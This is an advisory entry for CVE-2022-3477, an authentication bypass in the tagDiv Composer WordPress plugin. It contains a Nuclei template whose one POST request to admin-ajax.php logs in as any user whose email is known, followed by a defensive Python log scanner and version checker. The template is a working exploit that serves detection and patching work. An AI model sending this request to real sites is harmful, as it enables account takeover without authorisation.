The tagDiv Composer WordPress plugin before 3.5, required by the Newspaper WordPress theme before 12.1 and the Newsmag WordPress theme before 5.2.2, does not properly implement the Facebook login feature, allowing unauthenticated attackers to log in as any user simply by knowing that user's email address.
PoC code [publicly available]
id: CVE-2022-3477

info:
  name: WordPress tagDiv Composer < 3.5 - Authentication Bypass
  author: melmathari
  severity: critical
  description: |
    The tagDiv Composer WordPress plugin before 3.5, required by the Newspaper WordPress theme before 12.1 and Newsmag WordPress theme before 5.2.2, does not properly implement the Facebook login feature, allowing unauthenticated attackers to login as any user by just knowing their email address
  remediation: Fixed in 3.5
  reference:
    - https://wpscan.com/vulnerability/993a95d2-6fce-48de-ae17-06ce2db829ef
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3477
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-3477
    cwe-id: CWE-287
    epss-score: 0.58344
    epss-percentile: 0.98088
    cpe: cpe:2.3:a:newsmag_project:newsmag:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: newsmag_project
    product: newsmag
    framework: wordpress
  tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,auth-bypass,tagdiv,vkev,vuln

variables:
  email: "{{email}}" # victim's email address required.

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=td_ajax_fb_login_user&user[email]={{email}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":"You have been successfully logged in!'

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022062d52b551be3fe5529152bfadf95b550adb5ab5b12973ac42bc3ac007118ae3c022100c643899a4437a6e5b1895f66ddb8ebbe3537fe8dfad2dd0adb0e2eeb70efcead:922c64590222798bb761d5b6d8e72950
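The template above only probes for the issue. For the defending side, the following is an added example (not part of the Nuclei template, the tagDiv plugin, or the referenced advisories) that does two things a site operator wants after reading this: it triages installed versions against the fixed releases named in the advisory text (tagDiv Composer 3.5, Newspaper 12.1, Newsmag 5.2.2), and it scans request logs for calls to the `td_ajax_fb_login_user` AJAX action, separating confirmed logins (response carries the template's success string) from plain attempts. It assumes a WAF or reverse proxy that writes one JSON object per request with the fields `client_ip`, `method`, `uri`, `body` and `response_body`; those field names and the sample log records are constructed for the example.

```python
"""Log-side detection and version triage for CVE-2022-3477.

Added example, not part of the Nuclei template or the tagDiv plugin. It
assumes a WAF or reverse proxy that writes one JSON object per request with
the fields client_ip, method, uri, body and response_body (field names are an
assumption). The AJAX action, the request shape and the success string are
taken from the template; the fixed versions come from the advisory text.
"""
import json
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"
VULN_ACTION = "td_ajax_fb_login_user"
SUCCESS_MARKER = '"success":"You have been successfully logged in!'

# Versions in which the issue is fixed, per the advisory text.
FIXED_VERSIONS = {
    "td-composer": (3, 5),
    "newspaper": (12, 1),
    "newsmag": (5, 2, 2),
}


def parse_version(text):
    """Turn '3.4.9' into (3, 4, 9) so versions compare numerically."""
    return tuple(int(part) for part in text.strip().split("."))


def is_vulnerable(component, version):
    """True when the installed version is older than the fixed release."""
    return parse_version(version) < FIXED_VERSIONS[component]


def request_params(record):
    """Merge query-string and form-body parameters (admin-ajax reads both)."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(record.get("uri", "")).query).items()}
    params.update({k: v[0] for k, v in parse_qs(record.get("body", "")).items()})
    return params


def classify(record):
    """Return 'login-success' when the response shows a completed login,
    'attempt' when the vulnerable action was invoked without one, and
    None for unrelated traffic."""
    if urlsplit(record.get("uri", "")).path != AJAX_PATH:
        return None
    if request_params(record).get("action") != VULN_ACTION:
        return None
    if SUCCESS_MARKER in record.get("response_body", ""):
        return "login-success"
    return "attempt"


def scan(lines):
    """Return (verdict, client_ip, targeted_email) for every matching line."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed log lines rather than abort the scan
        verdict = classify(record)
        if verdict is None:
            continue
        email = request_params(record).get("user[email]", "")
        hits.append((verdict, record.get("client_ip", "?"), email))
    return hits


# Constructed sample records; the success body mirrors the template's matcher.
SAMPLE_LOG = """\
{"client_ip": "203.0.113.7", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=td_ajax_fb_login_user&user[email]=admin@example.com", "response_body": "{\\"success\\":\\"You have been successfully logged in!\\"}"}
{"client_ip": "198.51.100.9", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=td_ajax_fb_login_user&user[email]=nobody@example.com", "response_body": "{\\"error\\":\\"login failed\\"}"}
{"client_ip": "192.0.2.5", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=heartbeat", "response_body": "{}"}
{"client_ip": "192.0.2.6", "method": "GET", "uri": "/wp-admin/admin-ajax.php?action=td_ajax_fb_login_user", "body": "", "response_body": ""}
"""

if __name__ == "__main__":
    for verdict, ip, email in scan(SAMPLE_LOG.splitlines()):
        print(f"{verdict:14} {ip:15} {email}")
    for component, version in (("td-composer", "3.4.9"), ("td-composer", "3.5")):
        print(component, version, "vulnerable" if is_vulnerable(component, version) else "fixed")
```

A legitimate Facebook login through an unpatched plugin produces the same `login-success` record as an exploitation attempt, so the scanner cannot tell them apart by itself; the useful rule is that on any install where `is_vulnerable()` is true, every `login-success` hit for a privileged account should be treated as a possible account takeover and the session invalidated after the update to 3.5. Parameters are merged from the query string and the body because `admin-ajax.php` accepts the action either way, which is why the GET record in the sample is still reported as an attempt.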